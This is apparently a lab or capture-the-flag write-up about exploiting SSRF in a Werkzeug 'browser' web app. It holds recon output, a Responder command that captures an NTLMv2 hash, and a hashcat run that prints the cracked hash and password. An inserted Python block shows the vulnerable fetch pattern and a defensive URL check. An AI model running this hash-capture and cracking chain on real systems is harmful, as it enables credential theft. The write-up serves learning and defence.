Web Services

5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp  open  http          syn-ack ttl 127 Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
| http-methods: 
WhatWeb report for http://192.168.105.165:8080
Status    : 200 OK
Title     : Super Secure Web Browser
IP        : 192.168.105.165
Country   : RESERVED, ZZ

Summary   : Bootstrap[3.3.6], HTML5, HTTPServer[Werkzeug/2.0.1 Python/3.9.0], JQuery[2.2.2], Python[3.9.0], Script, Werkzeug[2.0.1]

Detected Plugins:
[ Bootstrap ]
	Bootstrap is an open source toolkit for developing with
	HTML, CSS, and JS.

	Version      : 3.3.6
	Website     : https://getbootstrap.com/

[ HTML5 ]
	HTML version 5, detected by the doctype declaration


[ HTTPServer ]
	HTTP server header string. This plugin also attempts to
	identify the operating system from the server header.

	String       : Werkzeug/2.0.1 Python/3.9.0 (from server string)

[ JQuery ]
	A fast, concise, JavaScript that simplifies how to traverse
	HTML documents, handle events, perform animations, and add
	AJAX.

	Version      : 2.2.2
	Website     : http://jquery.com/

[ Python ]
	Python is a programming language that lets you work more
	quickly and integrate your systems more effectively. You
	can learn to use Python and see almost immediate gains in
	productivity and lower maintenance costs.

	Version      : 3.9.0
	Website     : http://www.python.org/

[ Script ]
	This plugin detects instances of script HTML elements and
	returns the script language/type.


[ Werkzeug ]
	Werkzeug is a WSGI utility library for Python.

	Version      : 2.0.1
	Website     : http://werkzeug.pocoo.org/

HTTP Headers:
	HTTP/1.0 200 OK
	Content-Type: text/html; charset=utf-8
	Content-Length: 3608
	Server: Werkzeug/2.0.1 Python/3.9.0
	Date: Thu, 14 Jul 2022 20:10:20 GMT

It's a web browser which I could refer back to my own host, and it would visit my links.

I tried different approaches such as uploading PHP, ASP and ASPX files, but to no avail. However, there's some cool shit I heard a long time ago from a post I saw on LinkedIn: "If there is a URL input, there is SSRF".

"A successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. In some situations, the SSRF vulnerability might allow an attacker to perform arbitrary command execution."

Apparently, if you listen with Responder you are able to capture an NTLMv2 hash.

responder -I tun0 -wv

Notice how the website is some sort of browser. I wonder what sort of stuff one can do with SSRF; I know so many websites that are like this. I used to use obviously legal YouTube video converters, and they required you to input a link, which I'm guessing, if I fired up my own web server, I would be able to capture hashes with Responder and do some other crazy stuff. I will definitely go through the SSRF section on PortSwigger Academy.
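The weakness being exploited above is a "fetch this URL for me" feature that sends the request with no control over where it goes. As an added example (not code from this write-up or from the target application), here is that vulnerable pattern next to the destination check a defender would put in front of it: only http/https, no credentials in the URL, an optional host allowlist, and every resolved address must be public. Standard library only; the resolver is injectable so the check can be run offline against constructed DNS answers. Hostnames, IPs and the `FAKE_DNS` table are constructed for the demo.

```python
"""SSRF: the unchecked fetch and a hardened destination check (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def fetch_unchecked(url):
    """Vulnerable pattern: the server fetches whatever the user typed.

    Nothing stops the URL from pointing at loopback, an internal range, a
    file:// path, or an outside listener. If the server-side client also
    auto-authenticates, that listener receives an NTLM response.
    Kept for contrast only; nothing below calls it.
    """
    import urllib.request  # hypothetical fetcher used by such an app
    return urllib.request.urlopen(url).read()


def _resolve(host):
    """Default resolver: every address the OS would actually connect to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_outbound_url(url, resolve=_resolve, host_allowlist=None):
    """Return (ok, reason); ok is True only when every check passes."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme or '<none>'}"
    if parts.username or parts.password:
        return False, "credentials embedded in URL"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if host_allowlist is not None and host.lower() not in host_allowlist:
        return False, f"host not on allowlist: {host}"
    # IP literals are checked directly; names are resolved and every
    # answer is checked, so a split A record cannot smuggle a private IP.
    try:
        ipaddress.ip_address(host)
        addrs = {host}
    except ValueError:
        try:
            addrs = resolve(host)
        except OSError as exc:
            return False, f"resolution failed: {exc}"
    if not addrs:
        return False, "host resolved to nothing"
    for addr in addrs:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False, f"unparseable address {addr!r}"
        # is_global is False for loopback, RFC 1918, link-local (incl.
        # 169.254.169.254), CGNAT, and the documentation ranges.
        if not ip.is_global:
            return False, f"{host} resolves to non-public address {ip}"
    return True, "ok"


# Constructed DNS answers so the check runs offline.
FAKE_DNS = {
    "public.example": {"93.184.216.34"},             # a public address
    "internal.corp": {"10.0.0.5"},                   # RFC 1918
    "dual.example": {"93.184.216.34", "127.0.0.1"},  # split answer
}


def fake_resolve(host):
    """Stand-in for _resolve; raises like getaddrinfo for unknown names."""
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed NXDOMAIN for {host}")
    return FAKE_DNS[host]


if __name__ == "__main__":
    for candidate in ("http://public.example/page",
                      "http://internal.corp/",
                      "http://127.0.0.1:5985/wsman",
                      "file:///C:/Windows/win.ini"):
        print(candidate, "->", check_outbound_url(candidate, resolve=fake_resolve))
```

Two caveats for the situation in this write-up. First, the check above stops the loopback and internal-network cases, but a public listener still passes it, so the second control is the client itself: the component that follows the link must not be one that automatically sends Windows credentials, and the host should not be able to reach arbitrary internet addresses on SMB or with NTLM over HTTP (egress filtering). Second, resolve-then-check is only reliable if the fetch then connects to the addresses that were checked; a client that resolves the name a second time reopens a DNS-rebinding window.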

Enough talk, let's get to breaking this hash.

hashcat -m 5600 enox /usr/share/wordlists/rockyou.txt -r /home/kali/hashcatrules --debug-mode=1 --debug-file=matched.rule
ENOX::HEIST:ab8d09243f9210b2:00915cc0e81fe5868657b0d8c18d07b6:[...]:california
california
